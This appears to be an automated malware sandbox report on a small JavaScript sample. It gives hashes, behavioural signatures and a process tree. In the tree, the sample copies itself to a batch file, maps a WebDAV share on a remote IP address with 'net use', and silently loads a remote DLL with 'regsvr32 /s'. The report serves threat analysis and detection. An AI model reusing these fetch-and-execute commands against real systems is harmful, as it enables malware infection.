Analysis
-
max time kernel
12s -
max time network
23s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
09-07-2024 07:29
Static task
static1
Behavioral task
behavioral1
Sample
1603426775218191079.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
1603426775218191079.js
Resource
win10v2004-20240704-en
General
-
Target
1603426775218191079.js
-
Size
5KB
-
MD5
99dd53aabd10500b964e54dd71976462
-
SHA1
f52edd2018f70bf084415e772c128e742d94e440
-
SHA256
b6f8514e0590e879ccd88c011a7dc3b053ce1ea6ec82cb3d56577901e9640a2d
-
SHA512
eb24a20fba738b339a689e437c0c97eb9c607d6e06697b39b1a5d1266616728265d83a1f0bec6b0a883dc242216fbb61af3714daa221e4fde0820b108c241a9a
-
SSDEEP
96:SjNH3YjZzEU8sn5DDOnixUX/A4BbGE9OSbAeEwTtunc/QJWe4AdXALOBVo9t7zAt:2tPr/EUkG2oJm5Nm5klrkdle
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2256 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 3068 wrote to memory of 2304 3068 wscript.exe 30 PID 3068 wrote to memory of 2304 3068 wscript.exe 30 PID 3068 wrote to memory of 2304 3068 wscript.exe 30 PID 2304 wrote to memory of 2692 2304 cmd.exe 32 PID 2304 wrote to memory of 2692 2304 cmd.exe 32 PID 2304 wrote to memory of 2692 2304 cmd.exe 32 PID 2304 wrote to memory of 2256 2304 cmd.exe 33 PID 2304 wrote to memory of 2256 2304 cmd.exe 33 PID 2304 wrote to memory of 2256 2304 cmd.exe 33 PID 2304 wrote to memory of 2256 2304 cmd.exe 33 PID 2304 wrote to memory of 2256 2304 cmd.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\1603426775218191079.js1⤵
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\1603426775218191079.js" "C:\Users\Admin\\dqrwzx.bat" && "C:\Users\Admin\\dqrwzx.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2692
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\199.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2256
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD599dd53aabd10500b964e54dd71976462
SHA1f52edd2018f70bf084415e772c128e742d94e440
SHA256b6f8514e0590e879ccd88c011a7dc3b053ce1ea6ec82cb3d56577901e9640a2d
SHA512eb24a20fba738b339a689e437c0c97eb9c607d6e06697b39b1a5d1266616728265d83a1f0bec6b0a883dc242216fbb61af3714daa221e4fde0820b108c241a9a